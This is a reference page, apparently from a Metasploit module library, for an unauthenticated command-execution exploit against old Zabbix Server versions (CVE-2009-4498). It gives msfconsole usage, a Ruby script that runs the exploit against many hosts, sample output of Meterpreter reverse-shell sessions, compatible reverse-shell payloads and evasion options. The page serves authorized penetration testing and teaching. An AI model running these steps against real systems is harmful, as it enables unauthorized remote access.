Zabbix Server Arbitrary Command Execution - Metasploit


This page contains detailed information about how to use the exploit/linux/misc/zabbix_server_exec metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.

Module Overview


Name: Zabbix Server Arbitrary Command Execution
Module: exploit/linux/misc/zabbix_server_exec
Source code: modules/exploits/linux/misc/zabbix_server_exec.rb
Disclosure date: 2009-09-10
Last modification time: 2017-07-24 06:26:21 +0000
Supported architecture(s): cmd
Supported platform(s): Unix
Target service / protocol: -
Target network port(s): 10051
List of CVEs: CVE-2009-4498

This module abuses the "Command" trap in Zabbix Server to execute arbitrary commands without authentication. By default the Node ID "0" is used, if it doesn't work, the Node ID is leaked from the error message and exploitation retried. According to the vendor versions prior to 1.6.9 are vulnerable. The vulnerability has been successfully tested on Zabbix Server 1.6.7 on Ubuntu 10.04.

Module Ranking and Traits


Module Ranking:

  • excellent: The exploit will never crash the service. This is the case for SQL Injection, CMD execution, RFI, LFI, etc. No typical memory corruption exploits should be given this ranking unless there are extraordinary circumstances. More information about ranking can be found here.

Basic Usage


Using zabbix_server_exec against a single host

Normally, you can use exploit/linux/misc/zabbix_server_exec this way:

msf > use exploit/linux/misc/zabbix_server_exec
msf exploit(zabbix_server_exec) > show targets
    ... a list of targets ...
msf exploit(zabbix_server_exec) > set TARGET target-id
msf exploit(zabbix_server_exec) > show options
    ... show and set options ...
msf exploit(zabbix_server_exec) > exploit

Using zabbix_server_exec against multiple hosts

But it looks like this is a remote exploit module, which means you can also engage multiple hosts.

First, create a list of IPs you wish to exploit with this module. One IP per line.

Second, set up a background payload listener. This payload should be the same as the one your zabbix_server_exec will be using:

  1. Do: use exploit/multi/handler
  2. Do: set PAYLOAD [payload]
  3. Set other options required by the payload
  4. Do: set EXITONSESSION false
  5. Do: run -j

At this point, you should have a payload listening.

Next, create the following script. Notice you will probably need to modify the ip_list path, and payload options accordingly:

<ruby>
#
# Modify the path if necessary
#
ip_list = '/tmp/ip_list.txt'

File.open(ip_list, 'rb').each_line do |ip|
  print_status("Trying against #{ip}")
  run_single("use exploit/linux/misc/zabbix_server_exec")
  run_single("set RHOST #{ip}")
  run_single("set DisablePayloadHandler true")

  #
  # Set a payload that's the same as the handler.
  # You might also need to add more run_single commands to configure other
  # payload options.
  #
  run_single("set PAYLOAD [payload name]")

  run_single("run")
end
</ruby>

Next, run the resource script in the console:

msf > resource [path-to-resource-script]

And finally, you should see that the exploit is trying against those hosts similar to the following MS08-067 example:

msf > resource /tmp/exploit_hosts.rc
[*] Processing /tmp/exploit_hosts.rc for ERB directives.
[*] resource (/tmp/exploit_hosts.rc)> Ruby Code (402 bytes)
[*] Trying against 192.168.1.80

RHOST => 192.168.1.80
DisablePayloadHandler => true
PAYLOAD => windows/meterpreter/reverse_tcp
LHOST => 192.168.1.199

[*] 192.168.1.80:445 - Automatically detecting the target...
[*] 192.168.1.80:445 - Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] 192.168.1.80:445 - Selected Target: Windows XP SP3 English (AlwaysOn NX)
[*] 192.168.1.80:445 - Attempting to trigger the vulnerability...
[*] Sending stage (957999 bytes) to 192.168.1.80
[*] Trying against 192.168.1.109
RHOST => 192.168.1.109
DisablePayloadHandler => true
PAYLOAD => windows/meterpreter/reverse_tcp
LHOST => 192.168.1.199
[*] 192.168.1.109:445 - Automatically detecting the target...
[*] 192.168.1.109:445 - Fingerprint: Windows 2003 - Service Pack 2 - lang:Unknown
[*] 192.168.1.109:445 - We could not detect the language pack, defaulting to English
[*] 192.168.1.109:445 - Selected Target: Windows 2003 SP2 English (NX)
[*] 192.168.1.109:445 - Attempting to trigger the vulnerability...
[*] Meterpreter session 1 opened (192.168.1.199:4444 -> 192.168.1.80:1071) at 2016-03-02 19:32:49 -0600

[*] Sending stage (957999 bytes) to 192.168.1.109
[*] Meterpreter session 2 opened (192.168.1.199:4444 -> 192.168.1.109:4626) at 2016-03-02 19:32:52 -0600

Required Options


  • RHOSTS: The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'

Go back to menu.

Msfconsole Usage


Here is how the linux/misc/zabbix_server_exec exploit module looks in the msfconsole:

msf6 > use exploit/linux/misc/zabbix_server_exec

msf6 exploit(linux/misc/zabbix_server_exec) > show info

       Name: Zabbix Server Arbitrary Command Execution
     Module: exploit/linux/misc/zabbix_server_exec
   Platform: Unix
       Arch: cmd
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Excellent
  Disclosed: 2009-09-10

Provided by:
  Nicob <[email protected]>
  juan vazquez <[email protected]>

Available targets:
  Id  Name
  --  ----
  0   Zabbix 1.6.7

Check supported:
  Yes

Basic options:
  Name    Current Setting  Required  Description
  ----    ---------------  --------  -----------
  RHOSTS                   yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
  RPORT   10051            yes       The target port (TCP)

Payload information:

Description:
  This module abuses the "Command" trap in Zabbix Server to execute 
  arbitrary commands without authentication. By default the Node ID 
  "0" is used, if it doesn't work, the Node ID is leaked from the 
  error message and exploitation retried. According to the vendor 
  versions prior to 1.6.9 are vulnerable. The vulnerability has been 
  successfully tested on Zabbix Server 1.6.7 on Ubuntu 10.04.

References:
  https://nvd.nist.gov/vuln/detail/CVE-2009-4498
  OSVDB (60965)
  http://www.securityfocus.com/bid/37989
  https://www.exploit-db.com/exploits/10432
  https://support.zabbix.com/browse/ZBX-1030

Module Options


This is a complete list of options available in the linux/misc/zabbix_server_exec exploit:

msf6 exploit(linux/misc/zabbix_server_exec) > show options

Module options (exploit/linux/misc/zabbix_server_exec):

   Name    Current Setting  Required  Description
   ----    ---------------  --------  -----------
   RHOSTS                   yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT   10051            yes       The target port (TCP)

Exploit target:

   Id  Name
   --  ----
   0   Zabbix 1.6.7

Advanced Options


Here is a complete list of advanced options supported by the linux/misc/zabbix_server_exec exploit:

msf6 exploit(linux/misc/zabbix_server_exec) > show advanced

Module advanced options (exploit/linux/misc/zabbix_server_exec):

   Name                    Current Setting  Required  Description
   ----                    ---------------  --------  -----------
   CHOST                                    no        The local client address
   CPORT                                    no        The local client port
   ConnectTimeout          10               yes       Maximum number of seconds to establish a TCP connection
   ContextInformationFile                   no        The information file that contains context information
   DisablePayloadHandler   false            no        Disable the handler code for the selected payload
   EnableContextEncoding   false            no        Use transient context when encoding payloads
   Proxies                                  no        A proxy chain of format type:host:port[,type:host:port][...]
   SSL                     false            no        Negotiate SSL/TLS for outgoing connections
   SSLCipher                                no        String for SSL cipher - "DHE-RSA-AES256-SHA" or "ADH"
   SSLVerifyMode           PEER             no        SSL verification method (Accepted: CLIENT_ONCE, FAIL_IF_NO_PEER_CERT, NONE, PEER)
   SSLVersion              Auto             yes       Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2)
   VERBOSE                 false            no        Enable detailed status messages
   WORKSPACE                                no        Specify the workspace for this module
   WfsDelay                2                no        Additional delay in seconds to wait for a session

Exploit Targets


Here is a list of targets (platforms and systems) which the linux/misc/zabbix_server_exec module can exploit:

msf6 exploit(linux/misc/zabbix_server_exec) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Zabbix 1.6.7

Compatible Payloads


This is a list of possible payloads which can be delivered and executed on the target system using the linux/misc/zabbix_server_exec exploit:

msf6 exploit(linux/misc/zabbix_server_exec) > show payloads

Compatible Payloads
===================

   #  Name                                        Disclosure Date  Rank    Check  Description
   -  ----                                        ---------------  ----    -----  -----------
   0  payload/cmd/unix/generic                                     normal  No     Unix Command, Generic Command Execution
   1  payload/cmd/unix/reverse                                     normal  No     Unix Command Shell, Double Reverse TCP (telnet)
   2  payload/cmd/unix/reverse_bash_telnet_ssl                     normal  No     Unix Command Shell, Reverse TCP SSL (telnet)
   3  payload/cmd/unix/reverse_ssl_double_telnet                   normal  No     Unix Command Shell, Double Reverse TCP SSL (telnet)

Evasion Options


Here is the full list of possible evasion options supported by the linux/misc/zabbix_server_exec exploit in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):

msf6 exploit(linux/misc/zabbix_server_exec) > show evasion

Module evasion options:

   Name                Current Setting  Required  Description
   ----                ---------------  --------  -----------
   TCP::max_send_size  0                no        Maxiumum tcp segment size.  (0 = disable)
   TCP::send_delay     0                no        Delays inserted before every send.  (0 = disable)

Go back to menu.

Error Messages


This module may fail with the following error messages:

Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.

Failed to execute the command


Here is a relevant code snippet related to the "Failed to execute the command" error message:

131:	    if (datastore['CMD'])
132:	      if res and res =~ /\x30\xad/
133:	        print_good("Command executed successfully")
134:	        print_status("Output:\n#{res.split("\x30\xad").last}")
135:	      else
136:	        print_error("Failed to execute the command")
137:	      end
138:	    end
139:	
140:	  end
141:	end

Go back to menu.


References


See Also


Check also the following modules related to this module:

Related Nessus plugins:

Authors


  • Nicob <nicob[at]nicob.net>
  • juan vazquez

Version


This page has been produced using Metasploit Framework version 6.2.9-dev. For more modules, visit the Metasploit Module Library.

Go back to menu.